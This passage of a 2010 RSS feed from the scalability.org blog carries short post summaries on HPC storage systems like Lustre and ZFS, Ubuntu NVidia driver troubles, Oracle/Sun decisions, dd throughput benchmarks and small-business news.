      <description>Strong storms ran through the area Friday night. And it messed with TV and internet. The former, not so concerned about. The latter &amp;hellip; scalability.org runs from a home machine. We don&amp;rsquo;t generate revenue from it, and I am not willing to host it on a provider so I don&amp;rsquo;t want it to be marginally more costly than our internet service plus our home power to run the server (relatively light BTW).</description>
    </item>
    
    <item>
      <title>You knew something like this was coming ...</title>
      <link>https://blog.scalability.org/2010/06/you-knew-something-like-this-was-coming/</link>
      <pubDate>Fri, 18 Jun 2010 14:57:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/you-knew-something-like-this-was-coming/</guid>
      <description>Oracle setting Solaris on HP boxen. Oracle wants the hardware revenue too &amp;hellip; though it could also be a step to dropping x64 platforms for Solaris.
I can&amp;rsquo;t see how this is a good move for Solaris ubiquity, given the ability of HP to move hardware. And the name of the game for growing OS support is &amp;hellip; curiously &amp;hellip; ubiquity.</description>
    </item>
    
    <item>
      <title>Fortran IO giving customers grief</title>
      <link>https://blog.scalability.org/2010/06/fortran-io-giving-customers-grief/</link>
      <pubDate>Fri, 11 Jun 2010 22:26:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/fortran-io-giving-customers-grief/</guid>
      <description>This is annoying. Intel&amp;rsquo;s compilers do unbuffered IO by default (as in out of the box). Which means if you have code like this: #define BIG 1000000000 real*8 X(BIG) do i=1,BIG write (unit=10,*) X(i) enddo then you are going to suffer terrible performance, as Fortran (Intel&amp;rsquo;s compiled version) will do a flush at the end of each write. Which means, for a high performance network file system, you are going be hitting it with many ~25 byte writes.</description>
    </item>
    
    <item>
      <title>Unintended consequences ...</title>
      <link>https://blog.scalability.org/2010/06/unintended-consequences/</link>
      <pubDate>Fri, 11 Jun 2010 14:34:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/unintended-consequences/</guid>
      <description>So the fine folks at Adobe have decided to yank the beta for 10.1 flash player for 64 bit Linux. And in a Kafkaesque manner, have suggested discussing this in the forum &amp;hellip; which they marked as &amp;ldquo;read only&amp;rdquo;. Umm &amp;hellip;. are they trying, purposely, to lend credence to Steve Jobs&#39; points about closed technologies that are bug ridden?
This project is being closed apparently due to a zero day hard-to-fix exploit &amp;hellip; based upon a supposition that the recent flash exploits had been patched on some platforms.</description>
    </item>
    
    <item>
      <title>Open source and billion dollar ($109USD) companies</title>
      <link>https://blog.scalability.org/2010/06/open-source-and-billion-dollar-109usd-companies/</link>
      <pubDate>Fri, 11 Jun 2010 12:36:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/open-source-and-billion-dollar-109usd-companies/</guid>
      <description>An interesting post in computer world UK on why open source companies, and Redhat in particular are not larger. The raison d&amp;rsquo;etre  for open source in business is an effective reduction in costs. The increase in quality over some of the closed source alternatives is also very attractive. Increased quality lowers costs. Of course, not all open source is better &amp;hellip; witness the changes Ubuntu has made in their NVidia support, opting for the lower quality nouveau driver as compared to the very good NVidia driver.</description>
    </item>
    
    <item>
      <title>... and parascale appears to be in trouble ...</title>
      <link>https://blog.scalability.org/2010/06/and-parascale-appears-to-be-in-trouble/</link>
      <pubDate>Tue, 08 Jun 2010 20:19:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/and-parascale-appears-to-be-in-trouble/</guid>
      <description>Provider of a &amp;ldquo;cloud NAS&amp;rdquo; (getting to be a crowded market), and then doing strategy switching &amp;hellip; hmmm. The Register has the story. Sounds like they tried to grab one of our mantras, apparently unsuccessfully. I am not sure if they are a competitor, we&amp;rsquo;ve never run into them. The register piece notes the crowded NAS landscape, but doesn&amp;rsquo;t seem to be looking at the cluster storage landscape which, I&amp;rsquo;d argue, was more of the parascale play.</description>
    </item>
    
    <item>
      <title>ext3 branch Next3 released</title>
      <link>https://blog.scalability.org/2010/06/ext3-branch-next3-released/</link>
      <pubDate>Tue, 08 Jun 2010 17:17:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/ext3-branch-next3-released/</guid>
      <description>This is interesting at some level, as it is ext3 with snapshots. It is also not as interesting as it is based on &amp;hellip; ext3 &amp;hellip; which isn&amp;rsquo;t exactly a high performance file system. Not to mention the 8TB limit on volumes, and 2TB on files. Haven&amp;rsquo;t seen customers run into the latter, have seen them run into the former. Head first, and hard. I&amp;rsquo;d argue that this capability would be better merged with ext4, though as I understand it, Ted T&amp;rsquo;so isn&amp;rsquo;t quite interested at this point.</description>
    </item>
    
    <item>
      <title>Lustre&#39;s future</title>
      <link>https://blog.scalability.org/2010/06/lustres-future/</link>
      <pubDate>Tue, 08 Jun 2010 13:48:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/lustres-future/</guid>
      <description>I&amp;rsquo;ve written here in the past about this. I have concerns as we have multiple customers using Lustre, and the official roadmap for support/releases for Lustre is anything but assuring. Moreover, it completely forecloses upon independent appliance makers using Lustre without blessing from a competitive/engaged Oracle &amp;hellip; it is left to the reader to decide whether this will or will not happen. As I had noted before, this throws a wrench in the works of the smaller fry like Terascala.</description>
    </item>
    
    <item>
      <title>ZFS on Linux?</title>
      <link>https://blog.scalability.org/2010/06/zfs-on-linux/</link>
      <pubDate>Tue, 08 Jun 2010 10:52:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/zfs-on-linux/</guid>
      <description>It appears that this is in process &amp;hellip; no, not simply the ZFS on FUSE, but a full fledged kernel subsystem. This is interesting. ZFS is of course, the Sun file system which has had an altogether ridiculous amount of hype, while having a modest set of nice features. The Solaris and OpenSolaris was released under was not compatible with GPL, hence many people considered this OSino (Open Source in name only), as it was not legally possible to intermix the code between the largest GPL project (Linux) and the OpenSolaris code base.</description>
    </item>
    
    <item>
      <title>Oracle/Sun to axe products based upon Opteron</title>
      <link>https://blog.scalability.org/2010/06/oraclesun-to-axe-products-based-upon-opteron/</link>
      <pubDate>Mon, 07 Jun 2010 07:26:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/oraclesun-to-axe-products-based-upon-opteron/</guid>
      <description>Well, this link from 2 weeks ago in The Reg claims this. If this is the case, and I have no reason to doubt it, not only has thumper been EOLed, but Thor as well. We are already working out trade-in deals for customers with some of these EOLed bits. Looks like more in progress soon.</description>
    </item>
    
    <item>
      <title>The joy of VOIP</title>
      <link>https://blog.scalability.org/2010/06/the-joy-of-voip/</link>
      <pubDate>Sun, 06 Jun 2010 17:43:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/the-joy-of-voip/</guid>
      <description>Our VOIP provider has some significant problems. A utility provider can&amp;rsquo;t make changes and then insist that we&amp;rsquo;ve changed something in our own network (we haven&amp;rsquo;t), as to the reason why the phones enter endless reboot cycles. Their firmware updates seem not to like traversing our router anymore. But we didn&amp;rsquo;t change our router. They did change their firmware. Since that change, we&amp;rsquo;ve had all manner of problems. So I think we are going to have to fire them and find a new provider.</description>
    </item>
    
    <item>
      <title>Taking our lumps and some of our partners lumps while we are at it</title>
      <link>https://blog.scalability.org/2010/06/taking-our-lumps-and-some-of-our-partners-lumps-while-we-are-at-it/</link>
      <pubDate>Sat, 05 Jun 2010 20:33:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/taking-our-lumps-and-some-of-our-partners-lumps-while-we-are-at-it/</guid>
      <description>We had a recent event that badly irked a customer, and rightly so. It took far too long for us to be able to get a replacement part for them. I want to talk about this a little. I won&amp;rsquo;t name the customer or partner, or the product. The punchline for the customer was that they got their replacement part more than a month late. For an enterprise shop. This was IMO unacceptable.</description>
    </item>
    
    <item>
      <title>Going to need to write up a site preparation sheet ...</title>
      <link>https://blog.scalability.org/2010/06/going-to-need-to-write-up-a-site-preparation-sheet/</link>
      <pubDate>Sat, 05 Jun 2010 19:51:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/going-to-need-to-write-up-a-site-preparation-sheet/</guid>
      <description>&amp;hellip; that covers some basic things. Like cooling, power, IPMI, &amp;hellip; We&amp;rsquo;ve seen a common thread throughout a number of data centers recently, where we&amp;rsquo;ve placed a machine. Occasionally, the airflow will be too low or, following the fads as of late, too warm, to be effective at cooling a high performance machine. More to the point, its great when your density per rack U is not that high to have warmer air or less air flow going.</description>
    </item>
    
    <item>
      <title>This wouldn&#39;t surprise me if true ...</title>
      <link>https://blog.scalability.org/2010/06/this-wouldnt-surprise-me-if-true/</link>
      <pubDate>Tue, 01 Jun 2010 08:07:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/this-wouldnt-surprise-me-if-true/</guid>
      <description>Financial Times reports Google is restricting Windows deployments for security reasons. We do still run windows, but mostly in VMs at this point. Frankly, this is one of the very few ways we know that we can be safe in using Windows. We can recover from the nearly inevitable viri/trojans quickly. In part by not letting Windows touch the silicon directly. We can bottle it up, put hard restrictions on it, and if it gets infected, revert very quickly to a previous non-infected variant.</description>
    </item>
    
    <item>
      <title>siCluster attached to #77 on top500 list</title>
      <link>https://blog.scalability.org/2010/05/sicluster-attached-to-77-on-top500-list/</link>
      <pubDate>Mon, 31 May 2010 21:24:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/05/sicluster-attached-to-77-on-top500-list/</guid>
      <description>Our siCluster storage cluster, currently running Lustre 1.8.2 on Centos 5.4 is attached to the #77 system on the top500 supercomputer list</description>
    </item>
    
    <item>
      <title>So what do you do when a former customer builds a poor copy of your design?</title>
      <link>https://blog.scalability.org/2010/05/so-what-do-you-do-when-a-former-customer-builds-a-poor-copy-of-your-design/</link>
      <pubDate>Mon, 31 May 2010 21:14:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/05/so-what-do-you-do-when-a-former-customer-builds-a-poor-copy-of-your-design/</guid>
      <description>Gotta laugh a little. Feel bad for them, they don&amp;rsquo;t quite know all the ins and outs of what they are getting into. And thats fine. Nothing quite like jumping into it with both feet and hoping you can stay afloat. More power to them. I hope they survive this choice, though the last folks that did that to us didn&amp;rsquo;t last a year.</description>
    </item>
    
    <item>
      <title>Capital update</title>
      <link>https://blog.scalability.org/2010/05/capital-update/</link>
      <pubDate>Sat, 29 May 2010 14:11:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/05/capital-update/</guid>
      <description>Last year, we began working with a local group whose founder/president I had known for a few years previously. I won&amp;rsquo;t name them. We have a real need for capital. The company is self funded, and this means we fund all purchases out of our own pocket, or from our own lines of credit. And in some cases, being a small business, from my credit card (Lesson one in how to give a spouse a coronary: put a large purchase on a personal credit card &amp;hellip; you know, 5 or more digits before the decimal point).</description>
    </item>
    
    <item>
      <title>Maybe I need to move ...</title>
      <link>https://blog.scalability.org/2010/05/maybe-i-need-to-move/</link>
      <pubDate>Sat, 29 May 2010 13:22:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/05/maybe-i-need-to-move/</guid>
      <description>Saw this post on /. and the article it linked to. In it, the authors discuss human capital, the density of &amp;ldquo;smart people&amp;rdquo; (which they define as those with baccalaureate and graduate degrees). Using their particular definition (I won&amp;rsquo;t say if I do or do not agree with it right now), Detroit area, where we are, is near the bottom of the long tail. I can say that the places they indicate at the top of the heap &amp;hellip; SF, NYC, Minneapolis, Chicago, Seattle, Boston, Miami &amp;hellip; all places I have spend time working in with customers and users &amp;hellip; I&amp;rsquo;ve very much enjoyed my stay.</description>
    </item>
    
    <item>
      <title>been very busy ...</title>
      <link>https://blog.scalability.org/2010/05/been-very-busy/</link>
      <pubDate>Thu, 27 May 2010 13:57:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/05/been-very-busy/</guid>
      <description>&amp;hellip; slow posting &amp;hellip; will get back soon.</description>
    </item>
    
    <item>
      <title>OT:  tournament update</title>
      <link>https://blog.scalability.org/2010/05/ot-tournament-update/</link>
      <pubDate>Sun, 23 May 2010 13:48:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/05/ot-tournament-update/</guid>
      <description>So it was an experience getting back from Chicago to attend my tournament. But it was worth it. First the experience: Flight out was supposed to be at 4:40pm CST. Was delayed a little (airport was hectic), annoyed me a bit, as I had volunteered to help on the tournament setup, and I wound up missing this. Oh, and I left my ever-present bluetooth headset at the security checkpoint. More on that at the end.</description>
    </item>
    
    <item>
      <title>The future of kernel-specific version subsystems</title>
      <link>https://blog.scalability.org/2010/05/the-future-of-kernel-specific-version-subsystems/</link>
      <pubDate>Sun, 23 May 2010 12:56:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/05/the-future-of-kernel-specific-version-subsystems/</guid>
      <description>One of the issues we ran into with Lustre on our siCluster was the inability to use the kernel of our choice. Lustre is quite invasive in its patch sets. So modern kernels, ones with subsystem fixes, driver updates, and other things we need &amp;hellip;. can&amp;rsquo;t necessarily host Lustre without some serious forward porting of the code base. And this got me thinking. This isn&amp;rsquo;t the only project tied to specific kernel versions, and effectively unable to use an arbitrary kernel version.</description>
    </item>
    
    <item>
      <title>This conversation ... its just so enjoyable ... I must have it again ... no ... really ...</title>
      <link>https://blog.scalability.org/2010/05/this-conversation-its-just-so-enjoyable-i-must-have-it-again-no-really/</link>
      <pubDate>Wed, 19 May 2010 16:18:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/05/this-conversation-its-just-so-enjoyable-i-must-have-it-again-no-really/</guid>
      <description>Customer: We were told you make really fast tightly coupled storage and computing systems. Me (in my best Dr. Galakowicz voice): Yes, yes we do. They are fast. Really fast. Did I mention, they are fast? Customer: Thats great, &amp;lsquo;cause we need fast! Fast is really important to us. Fast is good. Really fast. Fast. &amp;hellip; er &amp;hellip; but we have a problem. Me: yes? Customer: er &amp;hellip; we can only buy from vendor X &amp;hellip; they won&amp;rsquo;t let us buy anything else Me: Even if you have a quantifiable business need, and your projects objectives wouldn&amp;rsquo;t be met by vendor X&amp;rsquo;s slow stuff, which represents an effective existential project risk?</description>
    </item>
    
    <item>
      <title>What a difference a distribution makes for Lustre</title>
      <link>https://blog.scalability.org/2010/05/what-a-difference-a-distribution-makes-for-lustre/</link>
      <pubDate>Wed, 19 May 2010 11:07:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/05/what-a-difference-a-distribution-makes-for-lustre/</guid>
      <description>Lustre 1.8.2 on SuSE is IMO, broken. I am not sure if it is repairable. Most of my comments on the brittle nature of Lustre come from this. Reloading with Centos 5.4, we are rock solid stable. Its scary. I am not sure what the issue is, but I think all future Lustre deployments we are going to do will focus upon Centos 5.4.</description>
    </item>
    
    <item>
      <title>Half open source drivers</title>
      <link>https://blog.scalability.org/2010/05/half-open-source-drivers/</link>
      <pubDate>Mon, 17 May 2010 01:14:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/05/half-open-source-drivers/</guid>
      <description>[Update] my apologies on the trackback/pingback spam. 33 of these. Given how people are attempting to influence Google et al.&amp;rsquo;s searching algorithm by initiating these pingbacks/trackbacks &amp;hellip; This is what SEO buys us folks. It wastes our time and resources cleaning up after it, and it negatively impacts the quality of responses to queries. This is good &amp;hellip; how? Trackbacks and pingbacks disabled for now. I&amp;rsquo;d posted about NVidia issues with Ubuntu 10.</description>
    </item>
    
    <item>
      <title>I have two copies of this in softcover ... now its digital ... quite nice!</title>
      <link>https://blog.scalability.org/2010/05/i-have-two-copies-of-this-in-softcover-now-its-digital-quite-nice/</link>
      <pubDate>Fri, 14 May 2010 14:12:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/05/i-have-two-copies-of-this-in-softcover-now-its-digital-quite-nice/</guid>
      <description>This. Maybe if I am lucky, I can get to play with these tools again.</description>
    </item>
    
    <item>
      <title>4 for 4, and its not good</title>
      <link>https://blog.scalability.org/2010/05/4-for-4-and-its-not-good/</link>
      <pubDate>Sun, 09 May 2010 12:03:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/05/4-for-4-and-its-not-good/</guid>
      <description>Ubuntu 10.04. 4 separate machines. All having some sort of nVidia card for CUDA/GPU work. All started from base desktop load. All, every single one of them, unable to update to CUDA enabled drivers. Or even to the Canonical hosted non-CUDA drivers. Get a black screen. On all 4 boxen. With vanilla loads. With very different motherboards. I appear to be in good company. Few people can get the NVidia drivers working.</description>
    </item>
    
    <item>
      <title>ever have one of &#34;those days&#34; ...</title>
      <link>https://blog.scalability.org/2010/05/ever-have-one-of-those-days-2/</link>
      <pubDate>Wed, 05 May 2010 23:54:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/05/ever-have-one-of-those-days-2/</guid>
      <description>My wife consoles me with a yin-yang view. Hopefully some large amount of goodness is to occur soon. Ever have a day where you just can&amp;rsquo;t get ahead of the support queue &amp;hellip; stuff keeps piling up. You run an errand and people call. You walk them through problems, and more call. For every one problem you fix, two new ones show up. Pretty soon, everyone is answering phones, and dealing with problems.</description>
    </item>
    
    <item>
      <title>A very poor choice</title>
      <link>https://blog.scalability.org/2010/04/a-very-poor-choice/</link>
      <pubDate>Wed, 28 Apr 2010 14:45:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/a-very-poor-choice/</guid>
      <description>Ubuntu 10.04 isn&amp;rsquo;t out yet. But will be soon. In it, there are some good things, some nice things. And an insanely poor choice. They are effectively preventing users with NVidia cards from using NVidia&amp;rsquo;s drivers. You have to go through some absolutely insane hoops to be able to use NVidia&amp;rsquo;s drivers. The Nouveau driver is incomplete, isn&amp;rsquo;t up to the performance on 3D graphics, nor the stability of the NVidia drivers.</description>
    </item>
    
    <item>
      <title>Lustre&#39;s future, part 1 of a few</title>
      <link>https://blog.scalability.org/2010/04/lustres-future-part-1-of-a-few/</link>
      <pubDate>Sat, 24 Apr 2010 13:43:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/lustres-future-part-1-of-a-few/</guid>
      <description>[update] Jeff said substantially the same thing last year. Go figure :O I haven&amp;rsquo;t written up my thoughts after seeing the slides, speaking with some of the support team, seeing John West and John Leidel&amp;rsquo;s discussion of Lustre 2.0 on InsideHPC &amp;hellip; &amp;hellip; but I need to. So here is the first (very brief) comment. Here are a set of slides (hat tip to Chris S) which neatly summarizes what we see customers thinking.</description>
    </item>
    
    <item>
      <title>Now 2TB SAS drives are within ~10% the price of 2TB SATA drives ...</title>
      <link>https://blog.scalability.org/2010/04/now-2tb-sas-drives-are-within-10-the-price-of-2tb-sata-drives/</link>
      <pubDate>Sat, 24 Apr 2010 13:01:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/now-2tb-sas-drives-are-within-10-the-price-of-2tb-sata-drives/</guid>
      <description>(7200 RPM 3.5 inch) SAS has a few specific advantages over (7200 RPM 3.5 inch) SATA, not enough to justify a 50% premium for storage clusters and many storage apps. A 10%? Yeah, I think that could work. I&amp;rsquo;d like to build a few more of these. Definitely.</description>
    </item>
    
    <item>
      <title>color me impressed</title>
      <link>https://blog.scalability.org/2010/04/color-me-impressed-2/</link>
      <pubDate>Fri, 23 Apr 2010 17:32:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/color-me-impressed-2/</guid>
      <description>GAMESS running on Magny Cours and Istanbul &amp;hellip; I rebuilt them with OpenMPI 1.5 and 1.4.2. Running across 24 cores right now on each. They are running a test case now that, the previous fastest machine has been a Nehalem 3.2 GHz system. They are tearing up the track &amp;hellip;. The sockets version isn&amp;rsquo;t as good as the MPI version. You will see/hear more about this soon, in another white paper.</description>
    </item>
    
    <item>
      <title>1 CAD is now greater than 1 USD ...</title>
      <link>https://blog.scalability.org/2010/04/1-cad-is-now-greater-than-1-usd/</link>
      <pubDate>Fri, 23 Apr 2010 15:05:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/1-cad-is-now-greater-than-1-usd/</guid>
      <description>c.f. here
Live rates at 2010.04.23 19:18:28 UTC 1.00 USD	= 0.999750 CAD United States Dollars	Canada Dollars 1 USD = 0.999750 CAD	1 CAD = 1.00025 USD  Yeah, I know it fluctuates. Still, nice to have parity.</description>
    </item>
    
    <item>
      <title>New Magny Cours, Istanbul, and Nehalem BLAST white paper is up</title>
      <link>https://blog.scalability.org/2010/04/new-magny-cours-istanbul-and-nehalem-blast-white-paper-is-up/</link>
      <pubDate>Thu, 22 Apr 2010 09:13:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/new-magny-cours-istanbul-and-nehalem-blast-white-paper-is-up/</guid>
      <description>Grab a copy from here. We have been playing with Magny Cours and Istanbul for a while, and will be generating a number of white papers around these efforts. Comparisons to Nehalem of similar clock speed, and if available, other units. Magny Cours is a very interesting chip. 12 processor cores in a single socket. This has some interesting implications for performance, and you have to pay attention to things you might not have thought you needed to before.</description>
    </item>
    
    <item>
      <title>What if your state is hostile to your business?</title>
      <link>https://blog.scalability.org/2010/04/what-if-your-state-is-hostile-to-your-business/</link>
      <pubDate>Tue, 20 Apr 2010 13:25:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/what-if-your-state-is-hostile-to-your-business/</guid>
      <description>Here in Michigan, we need to find something new to do. This economy is built upon manufacturing, which is rapidly fleeing for the lower cost regions of the world. It is a foundational and critical mistake to try to reverse this, as manufacturing will always seek the lowest costs &amp;hellip; so unless you can provide them, you are going to lose this business eventually. Which means you shouldn&amp;rsquo;t invest tax dollars &amp;hellip; my dollars &amp;hellip; in helping such businesses &amp;ldquo;grow&amp;rdquo; here, as it inordinately transfers such tax burdens onto &amp;hellip; wait for it &amp;hellip; me and my fellow tax payers and small businesses.</description>
    </item>
    
    <item>
      <title>oh yay ... memory and disk pricing on the rise</title>
      <link>https://blog.scalability.org/2010/04/oh-yay-memory-and-disk-pricing-on-the-rise/</link>
      <pubDate>Mon, 19 Apr 2010 14:47:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/oh-yay-memory-and-disk-pricing-on-the-rise/</guid>
      <description>Up about 20% over the last month. Gotta love it. :(</description>
    </item>
    
    <item>
      <title>Ok, hunkering down for the hard work</title>
      <link>https://blog.scalability.org/2010/04/ok-hunkering-down-for-the-hard-work/</link>
      <pubDate>Fri, 16 Apr 2010 16:46:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/ok-hunkering-down-for-the-hard-work/</guid>
      <description>I have a white paper to get done by Sunday, an RFP response to get done by tomorrow, and a set of 3 quotes to do. Getting one done now, the rest are later tonight. No rest for the wicked.</description>
    </item>
    
    <item>
      <title>(will there be) a future for OpenSolaris?</title>
      <link>https://blog.scalability.org/2010/04/will-there-be-a-future-for-opensolaris/</link>
      <pubDate>Fri, 16 Apr 2010 16:00:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/will-there-be-a-future-for-opensolaris/</guid>
      <description>Saw this linked to from /. . Its pretty clear that Oracle is taking a deep, long, hard look at all projects within Sun, figuring out what to keep, and what to abandon. Things which have no hope of revenue generation, or driving business in general are not likely long for this world. This brings us to OpenSolaris. This is the &amp;ldquo;open source&amp;rdquo; version of Solaris. I put it in quotes, as it may technically be an open source license in some manner of speaking, but it is fundamentally incompatible with GPL, with Artistic, with &amp;hellip; you name it.</description>
    </item>
    
    <item>
      <title>day job has an opening</title>
      <link>https://blog.scalability.org/2010/04/day-job-has-an-opening/</link>
      <pubDate>Fri, 16 Apr 2010 00:50:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/day-job-has-an-opening/</guid>
      <description>We need a systems support engineer. Have a look at our career page for more info.</description>
    </item>
    
    <item>
      <title>... and this is the low performance box ...</title>
      <link>https://blog.scalability.org/2010/04/and-this-is-the-low-performance-box/</link>
      <pubDate>Thu, 15 Apr 2010 23:07:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/and-this-is-the-low-performance-box/</guid>
      <description>more benchmark pr0n for an early spring evening. This is the day jobs&amp;rsquo;s slower storage target forcost optimized storage functions.
root@dv4:~# dd if=/dev/zero of=/data/big.file ... 4096+0 records in 4096+0 records out 68719476736 bytes (69 GB) copied, 155.851 s, 441 MB/s root@dv4:~# dd of=/dev/null if=/data/big.file ... 4096+0 records in 4096+0 records out 68719476736 bytes (69 GB) copied, 72.2219 s, 952 MB/s  </description>
    </item>
    
    <item>
      <title>Wow ... just updated my Windows 7 VM ... and now it won&#39;t boot</title>
      <link>https://blog.scalability.org/2010/04/wow-just-updated-my-windows-7-vm-and-now-it-wont-boot/</link>
      <pubDate>Thu, 15 Apr 2010 19:32:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/wow-just-updated-my-windows-7-vm-and-now-it-wont-boot/</guid>
      <description>I had heard that there were some &amp;hellip; er &amp;hellip; issues with latest round of Microsoft patches. I think I have a backup of this VM, so I can roll back the changes. Sheesh. And yes, bringing up repair does in fact hang it hard. [sigh]</description>
    </item>
    
    <item>
      <title>What if the putative smoking gun wasn&#39;t, I dunno, a smoking gun?</title>
      <link>https://blog.scalability.org/2010/04/what-if-the-putative-smoking-gun-wasnt-i-dunno-a-smoking-gun/</link>
      <pubDate>Thu, 15 Apr 2010 17:41:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/what-if-the-putative-smoking-gun-wasnt-i-dunno-a-smoking-gun/</guid>
      <description>This is ridiculous. They rely upon statistical methods, and misuse them to create a smoking gun, are called to the mat on it, and then &amp;hellip;
erm &amp;hellip; if you use incorrect methods of analyzing your data, ones which admit biases and errors, its rather hard &amp;hellip; no &amp;hellip; fundamentally impossible &amp;hellip; to make a reasonably valid claim that the &amp;ldquo;underlying data&amp;rdquo; (which you analyzed incorrectly) actually supports the conclusions which you reached.</description>
    </item>
    
    <item>
      <title>OT: Back to (almost) normal</title>
      <link>https://blog.scalability.org/2010/04/ot-back-to-almost-normal/</link>
      <pubDate>Wed, 14 Apr 2010 16:59:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/ot-back-to-almost-normal/</guid>
      <description>Stent is out, kidney stones should be gone (modulo lithotripsy). Anesthetic really took it out of me on Monday, and I&amp;rsquo;d argue, on Tuesday. Happily, after Monday night, I was off of pain meds. I don&amp;rsquo;t like stuff that messes with my head, and what they gave me definitely messed with my head. I had to restrain myself from letting my internal dialog get out on more than one occasion. Less of a truth drug, more of an incomplete thought drug.</description>
    </item>
    
    <item>
      <title>Delivered two clusters last week ...</title>
      <link>https://blog.scalability.org/2010/04/delivered-two-clusters-last-week/</link>
      <pubDate>Sun, 11 Apr 2010 16:55:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/delivered-two-clusters-last-week/</guid>
      <description>one siCluster, one specialty computing system. Added 1/8th of a PetaByte to our shipped storage. I do apologize, we&amp;rsquo;ve been busy. And, by all indications, we haven&amp;rsquo;t seen nuthin yet. Lots of business queued up for Q2, including several siClusters, several specialist computing clusters, and a number of deskside supers in the CX1 and Pegasus flavors. This doesn&amp;rsquo;t include the various Delta-V&amp;rsquo;s, JackRabbits, and other bits we have been shipping. Customers in many different fields, over fairly wide geographies.</description>
    </item>
    
    <item>
      <title>I guess this means that it is ending 15 years early?</title>
      <link>https://blog.scalability.org/2010/04/i-guess-this-means-that-it-is-ending-15-years-early/</link>
      <pubDate>Mon, 05 Apr 2010 17:39:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/i-guess-this-means-that-it-is-ending-15-years-early/</guid>
      <description>From this article one gets the impression that Windows will not be supporting Itanium anymore. Way back during the initial marketing onslaught of Itanium, it was said to be the architecture for the next 25 years for Intel. That was a decade ago. It seems to be losing software support fairly rapidly though. Its hard to see this lasting another 15 years &amp;hellip; let alone 5 years. Linux still has Itanium support for now, but fewer users of it are out there.</description>
    </item>
    
    <item>
      <title>Rethinking how we build and invest in partnerships</title>
      <link>https://blog.scalability.org/2010/04/rethinking-how-we-build-and-invest-in-partnerships/</link>
      <pubDate>Sat, 03 Apr 2010 22:33:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/rethinking-how-we-build-and-invest-in-partnerships/</guid>
      <description>One of the things smaller companies want to do is to build alliances that are mutually beneficial &amp;hellip; be they reseller relationships, or partnerships where the sum of the two partners offerings provides significant tangible benefits for customers. Enhance offerings, provide more value to customers. These need to be two way streets &amp;hellip; they can&amp;rsquo;t be a one way flow, if they are to have real value. We&amp;rsquo;ve built some partnerships over the past few years, some very good, some, not as good, that have ranged between one way &amp;ldquo;tell us what you will do for us&amp;rdquo; scenarios, to what we thought were bilateral efforts at promoting mutual business.</description>
    </item>
    
    <item>
      <title>Cluster file systems views</title>
      <link>https://blog.scalability.org/2010/04/cluster-file-systems-views/</link>
      <pubDate>Sat, 03 Apr 2010 21:19:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/cluster-file-systems-views/</guid>
      <description>We&amp;rsquo;ve had a chance to do a compare/contrast in recent months between GlusterFS and Lustre. Way back in the 1.4 Lustre time period, we helped a customer get up and going with it. I seem to remember thinking that this was simply not something I felt comfortable leaving at a customer site without a dedicated file system engineer monitoring it/dealing with it 24x7. Seriously, it needed lots of hand-holding then. Have a recent 1.</description>
    </item>
    
    <item>
      <title>Did distributed memory really win?</title>
      <link>https://blog.scalability.org/2010/04/did-distributed-memory-really-win/</link>
      <pubDate>Thu, 01 Apr 2010 23:04:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/04/did-distributed-memory-really-win/</guid>
      <description>About a decade or more ago, there was a &amp;ldquo;fight&amp;rdquo; if you will, for the future of high performance computing systems application level programming interfaces. This fight was between proponents of SMP and shared memory systems in general, and DMP shared-nothing approaches. In the ensuing years, several important items influenced the trajectory of application development. Shared memory models are generally easier to program. That is, it&amp;rsquo;s not hard to create something that operates reasonably well in parallel.</description>
    </item>
    
    <item>
      <title>Brittle systems</title>
      <link>https://blog.scalability.org/2010/03/brittle-systems/</link>
      <pubDate>Thu, 01 Apr 2010 03:24:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/03/brittle-systems/</guid>
